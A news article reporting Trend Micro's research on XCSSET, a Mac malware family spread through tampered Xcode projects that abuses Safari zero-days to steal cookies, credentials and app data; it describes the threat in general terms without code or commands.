Mac malware spreads through Xcode projects, abuses WebKit, Data Vault vulnerabilities

XCSSET malware focuses on exploiting Safari and other browsers.
Written by Charlie Osborne, Contributing Writer

Xcode projects are being exploited to spread a form of Mac malware specializing in the compromise of Safari and other browsers.

The XCSSET malware family has been found in Xcode projects, "lead[ing] to a rabbit hole of malicious payloads," Trend Micro said on Thursday. 

In a paper (.PDF) exploring the wave of attacks, cybersecurity researchers said an "unusual" infection in a developer's project also included the discovery of two zero-day vulnerabilities. 

Xcode is a free integrated development environment (IDE) used in macOS for developing Apple-related software and apps. 

While it is not yet clear how XCSSET worms its way into Xcode projects, Trend Micro says that once embedded, the malware then runs when a project is built. 

Also: Have I Been Pwned to release code base to the open source community

"Presumably, these systems would be primarily used by developers," the team noted. "These Xcode projects have been modified such that upon building, these projects would run a malicious code. This eventually leads to the main XCSSET malware being dropped and run on the affected system."

A number of impacted developers have shared their projects on GitHub, which the researchers say could result in "supply chain-like attacks for users who rely on these repositories as dependencies in their own projects."

Once on a vulnerable system, XCSSET hones in on browsers including the development version of Safari, using vulnerabilities to steal user data. 

In Safari's case, the first of the two bugs is a flaw in Data Vault. A bypass method was found that circumvents the protection macOS puts in place for Safari cookie files via SSHD.

The second vulnerability of note is due to how Safari WebKit operates. Normally, launching the kit requires a user to submit their password, but a bypass was found that can be used to perform malicious operations via the un-sandboxed Safari browser. It also appears possible to perform Dylib hijacking.  

The security issues allow Safari cookies to be read and dumped, and these packets of data are then used to inject JavaScript-based backdoors into displayed pages via a Universal Cross-site Scripting (UXSS) attack.

CNET: Homeland Security details new tools for extracting device data at US borders

Trend Micro believes the UXSS element of the attack chain could be used not only to steal general user information, but also as a means to modify browser sessions to display malicious websites, change cryptocurrency wallet addresses, harvest Apple Store credit card information, and steal credentials from sources including Apple ID, Google, Paypal, and Yandex.

The malware is also able to steal a variety of other user data, including Evernote content, Notes information, and communication from Skype, Telegram, QQ, and WeChat applications. 

In addition, XCSSET can take screenshots, exfiltrate data and send stolen files to a command-and-control (C2) server, and also contains a ransomware module for file encryption and blackmail demand messages. 

TechRepublic: US and UK workers still logging 2 extra hours every day, according to VPN data

Only two Xcode projects harboring the malware have been found, together with 380 victim IPs -- the majority of which are located in China and India -- but the infection vector is still one of importance.  

"The method of distribution used can only be described as clever," Trend Micro says. "Affected developers will unwittingly distribute the malicious Trojan to their users in the form of the compromised Xcode projects, and methods to verify the distributed file (such as checking hashes) would not help as the developers would be unaware that they are distributing malicious files."

ZDNet has reached out to Trend Micro and Apple with additional queries and will update when we hear back. 

The biggest hacks, data breaches of 2020 (so far)

Previous and related coverage

Have a tip? Get in touch securely via WhatsApp | Signal at +447713 025 499, or over at Keybase: charlie0

Editorial standards